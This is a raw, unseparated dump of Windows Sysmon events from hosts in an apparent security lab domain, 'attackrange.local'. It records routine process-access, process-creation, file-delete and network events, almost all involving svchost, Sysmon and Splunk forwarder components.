08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.044{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD8F31FC9B29DC3FAED7B449A96C5809,SHA256=8841C7883F929E3AF82EBBAEFDC574564750E290FFA5C1C822E7C206F9B95EB4,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.775{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62022-false10.0.1.12-8000- 23542300x80000000000000001055812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:28.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66DAB87FD7CB90DC0C57261271E87EAD,SHA256=7D1C84BF680280B8C0FDCC936C63572E337EA63D3F343EAA467606BD62102B1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.293{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:28.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:28.277{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.277{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.264{0C1E0330-F930-60EB-FF79-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.262{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0F296D2BDF2D9DBFEE17A6077AE3A3,SHA256=A588CB830FF7BAC7351141B0933173AF180F463E49D68FCB2649552490E4DD51,IMPHASH=00000000000000000000000000000000falsetrue 
